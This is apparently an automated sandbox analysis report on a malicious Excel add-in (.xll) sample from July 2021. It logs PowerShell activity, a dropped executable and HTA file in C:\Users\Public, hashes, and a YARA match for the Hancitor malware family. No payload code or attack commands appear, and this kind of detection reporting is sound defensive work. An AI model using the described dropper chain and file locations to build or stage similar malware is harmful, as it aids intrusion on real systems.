Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Users\Public\snd32sys.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\Public\snd32sys.exe

Code function: 16_2_0062B84D GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

16_2_0062B84D

Source: C:\Users\Public\snd32sys.exe

Code function: 16_2_00657096 _free,_free,_free,GetTimeZoneInformation,_free,

16_2_00657096

Source: C:\Users\Public\snd32sys.exe

Code function: 16_2_00611A80 GetVersion,wsprintfA,wsprintfA,

16_2_00611A80

Remote Access Functionality:

Yara detected Hancitor

Source: Yara match	File source: 16.3.snd32sys.exe.12f4305.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.snd32sys.exe.12f4305.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.snd32sys.exe.610000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.437644933.00000000012F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: snd32sys.exe PID: 2160, type: MEMORY

ID:	445958
Product:	CloudBasic
Start time:	16:29:13
Start date:	08.07.2021
Sample:	0708_5355150121.xll
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	41e0318dfdb1c180a375a7efc712649e
SHA1:	f0c230010c7b85544c25879d4daf74479360e1bc
SHA256:	73b8c566d8cdf3200daa0b698b9d32a49b1ea8284a1e6aa6408eb9c9daaacb71
Filetype:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60%

Name	Type	MD5	SHA1	SHA256
C:\Users\Public\res32.hta	HTML document, ASCII text, with very long lines, with CRLF line terminators	71999A9D2F15E164C9B1FA926AA6444B	C1FBD2B6458B474A208B6CC710951940C9290E5C	DA92436D2BBCDEF52B11ACE6E2E063E9971CEFC074D194550BD425305C97CDD5
C:\Users\Public\snd32sys.exe	PE32 executable (GUI) Intel 80386, for MS Windows	ED1921467F6784AF6BDCA40A06A541B5	63B70725C3298D5FA17277EC64C77A4B6FBCF697	3DB14214A9EB98B3B5ABFFCB314C808A25ED82456CE01251D31E8EA960F6E4E6
C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\F2E779D9-2A7F-4724-B0D9-67BDDA1F0003	XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators	585F16F872D700ED9074C9599BFCAA8D	A7B0CEC26282A4EBDD6B8A336B6C922EB7CCB546	27F46B4BD834974CEEC3353473B97BCF16BD3AF5FBD14BEC8340D2B8048BA237
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	804765CA20FB452B7AFDC20F54DDC5BC	1E475060FAC7DC9546B6DF29B78D139485F5E105	1E64FB0B2717B6E64DC2C096EF0169206D5C25A854760C212FBA76EF5E362E51
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_021oib5j.5er.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_33lmhbcg.erz.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l5bzl405.f5n.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m31y4pff.piz.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\Documents\20210708\PowerShell_transcript.888683.0syxhOX+.20210708163014.txt	UTF-8 Unicode (with BOM) text, with CRLF line terminators	45D933EF1A814178B4C30D1C511EEA62	92AB0E5235A9C4FED5941154906879B3C51F8FD2	FF3092607FC1517161D2C45D1014A05475343498EEFC44C7C834FB81661D7688
C:\Users\user\Documents\20210708\PowerShell_transcript.888683.93l2YHGR.20210708163033.txt	UTF-8 Unicode (with BOM) text, with CRLF line terminators	2DB1F1A4DD113B692007B7089DE7A226	03920B9D36563DFB26E0408BD2A9DE9B8914F0FE	9815EE4EF24399DA60B77429BFB41E1D5BCDEB7B5FBA7DC2F4B9C442B7264215

Windows Analysis Report 0708_5355150121.xll

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Location Tracking:

Cryptography:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs